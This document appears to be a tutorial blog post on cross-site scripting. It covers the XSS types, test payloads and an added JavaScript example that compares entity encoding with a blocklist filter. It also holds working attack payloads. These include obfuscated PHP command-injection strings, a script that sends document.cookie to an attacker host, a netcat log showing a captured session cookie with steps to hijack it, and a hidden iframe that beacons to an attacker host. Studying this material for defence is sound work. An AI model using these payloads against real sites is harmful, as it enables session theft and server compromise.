Basic XSS
Small post covering some basic information on XSS attacks and some sample payloads.

What is XSS?

Cross Site Scripting (XSS) is a form of injection attack found in web applications. XSS vulnerabilities allow an attacker to inject malicious script into a website, usually through unsanitized input fields or parameters. How the injected code is handled differs between the types below, and that in turn determines how severe the vulnerability is.

Types of XSS:

  • Stored (persistent) XSS - Injects malicious code into a website’s forms, databases or other data. The injected code is stored on the server and returned to other users when they browse to an infected page.

  • Reflected (non-persistent) XSS - Injects malicious code into HTTP requests/parameters that are sent to the server, processed, and reflected straight back to the user in the response.

  • DOM XSS - The malicious code is never sent to the server; it is handled entirely client-side by scripts that read attacker-controlled data into the page’s DOM. If you’re unfamiliar with the DOM, please click here.

For more information I’d recommend checking out OWASP XSS and the OWASP XSS Prevention CheatSheet.

Common XSS Tests

</script><script> alert("XSS"); </script><script> 
"><script >alert(document.cookie)</script >
"><script>alert(document.cookie)</script><! -- 
<script>var a = '</script><script>alert(document.cookie)</script>
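The OWASP Prevention Cheat Sheet linked above comes down to one rule for these payloads: entity-encode untrusted data for the context it lands in rather than trying to filter it. The following is an added example, not code from the original post, that runs the four test payloads above through an OWASP-style HTML entity encoder and, for comparison, through a naive blocklist that only strips the literal `<script>`/`</script>` tokens. The names `encodeForHtml`, `naiveStripScript` and `evaluate` are the example's own.

```javascript
// Added example (not from the original post): output encoding versus blocklist
// filtering, tried against the four "Common XSS Tests" payloads above.
// Encoding follows OWASP XSS Prevention Cheat Sheet rule #1 (HTML body) and
// rule #2 (HTML attribute): every character that can change parsing context is
// replaced with an HTML entity, so the browser renders it as plain text.

// The four test payloads from this post, copied verbatim as sample input.
const SAMPLE_PAYLOADS = [
  '</script><script> alert("XSS"); </script><script> ',
  '"><script >alert(document.cookie)</script >',
  '"><script>alert(document.cookie)</script><! -- ',
  "<script>var a = '</script><script>alert(document.cookie)</script>",
];

const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// Entity-encode untrusted data before placing it in an HTML body or a quoted attribute.
function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (c) => HTML_ENTITIES[c]);
}

// A blocklist "sanitizer" that only removes the literal <script> and </script>
// tokens. It is here as the weak baseline: the second payload's "<script >"
// (space before the bracket) is written precisely to walk past a check like this.
function naiveStripScript(untrusted) {
  return String(untrusted).replace(/<script>/gi, '').replace(/<\/script>/gi, '');
}

// Score a sanitizer: how many payloads come out unable to open a tag (safe in an
// HTML body) and also unable to close a quoted attribute (safe in an attribute).
function evaluate(sanitizer, payloads = SAMPLE_PAYLOADS) {
  let bodySafe = 0;
  let attributeSafe = 0;
  for (const p of payloads) {
    const out = sanitizer(p);
    if (!/[<>]/.test(out)) bodySafe += 1;
    if (!/[<>"']/.test(out)) attributeSafe += 1;
  }
  return { bodySafe, attributeSafe, total: payloads.length };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('entity encoding :', evaluate(encodeForHtml));   // 4 of 4 in both contexts
  console.log('strip <script>  :', evaluate(naiveStripScript)); // 2 of 4 body, 0 of 4 attribute
}
```

Run it with `node` and compare the two scores: the encoder neutralises all four payloads in both contexts, while the blocklist leaves the `<script >` and `</script><! --` variants intact and never protects an attribute context at all, because it does nothing about the leading `">`.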

I encountered a form input field where XSS and PHP could be used in conjunction:

</script><?php shell_exec("AttackerIP"); ?><script> // ping ourselves
<\script><?php (sy.(st).em)(whoami);?><script>

<\script><?php system("\x69\x64")?><script>  // \x69\x64 == id

// \x3C\x3F\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6D\x28\x22\x69\x64\x22\x29\x3B\x3F\x3E == <?php system("id");?>

Stealing Cookies

<script> new Image().src="http://AttackerIP/bogus.php?output="+document.cookie; </script>

Start a netcat listener before injecting and you’ll receive the cookie:

# nc -nlvp 80
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 55540
GET /bogus.php?output=PHPSESSID=tvd2ljlt16328t3ej2pqliv5e2;%20LANG=EN_US;%20SINCE=1542307743;%20LIMIT=10;%20DOMAIN=admin HTTP/1.1
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,*

Once we have an authorised user’s cookie, we can simply use a Firefox extension like Cookie Quick Manager or Cookie Editor to load the stolen session ID into our own browser and access the web app as that user.

Browser Redirection & IFRAME Injection

<iframe SRC="http://AttackerIP/report" height = "0" width ="0"></iframe>

// Once the victim visits the affected page, their browser connects back to our attacking machine:

# nc -nlvp 80 
listening on [any] 80 ... 
connect to [AttackerIP] from (UNKNOWN) [Victim] 49275 
GET /report HTTP/1.1 
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* 
Accept-Language: en-US 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) 
Accept-Encoding: gzip, deflate 
Host: AttackerIP
Connection: Keep-Alive

// Browser redirection may be used to send a victim’s browser to a client-side attack or to an information-gathering script.

XSS Payloads and the XSS section of PayloadsAllTheThings are great resources for all things XSS.